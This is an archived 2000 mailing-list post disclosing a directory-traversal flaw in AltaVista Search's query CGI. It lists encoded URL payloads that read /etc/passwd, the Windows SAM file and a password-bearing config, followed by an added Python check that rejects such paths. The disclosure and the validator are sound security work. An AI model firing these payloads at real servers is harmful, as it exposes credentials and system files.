Altavista followup

From: rudi carell (rudicarellat_private)
Date: Sun Jan 09 2000 - 07:37:04 PST


    hola,
    
    more bugs in the AV-Search thing ..
    
    using uri-encoded strings it is possible to view "any" file on the system ..
    
    examples:
    
    unixxxsss ...
    
    http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
    
    or on a micro$oft IIS ...
    
    http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._
    
    interesting info about the file structure ...
    
    http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log
    
    or another file which does contain the password ..
    
    http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf
    
    altavista told me that this is(was) just a flavour of the "old" bug and its
    fix is(was) included in the last secpatch.
    
    whatever ....
    
    nicedays :-/
    
    RC
    rudicarellat_private
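
Added example, not part of the original post and not AltaVista's code: a server-side check that percent-decodes the `mss` value to a fixed point, canonicalizes it, and rejects anything that resolves outside a base directory, run over the query strings quoted in the post. `BASE_DIR`, the function names and the benign value `simple` are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

BASE_DIR = "/opt/search/templates"  # assumption: directory mss values must stay under

# Query strings as quoted in the post above (host part omitted).
POSTED = [
    "mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd",
    r"mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._",
    "mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log",
    "mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf",
]

def raw_param(query, name="mss"):
    """Return the still-encoded value of `name`, or None if absent."""
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        if key == name:
            return val
    return None

def resolve_mss(raw, base=BASE_DIR):
    """Return the canonical path under `base`, or None if the value is rejected."""
    value = raw
    for _ in range(3):              # decode until stable, so %252e%252e is seen as ".."
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    else:
        return None                 # still changing after three rounds: reject
    if "\x00" in value:
        return None
    value = value.replace("\\", "/")          # treat Windows separators as separators
    if value.startswith("/") or value[1:2] == ":":
        return None                           # absolute path or drive letter
    candidate = posixpath.normpath(posixpath.join(base, value))
    if candidate != base and not candidate.startswith(base + "/"):
        return None                           # resolved outside the base directory
    return candidate

def check_query(query):
    raw = raw_param(query)
    return None if raw is None else resolve_mss(raw)

if __name__ == "__main__":
    for q in POSTED + ["mss=simple"]:
        print(q, "->", check_query(q))
```

The check is purely lexical; on a real filesystem the resolved path should also be compared after `os.path.realpath`, since a symlink inside the base directory can still point outside it.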
    
    
    
    
    
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:27:27 PDT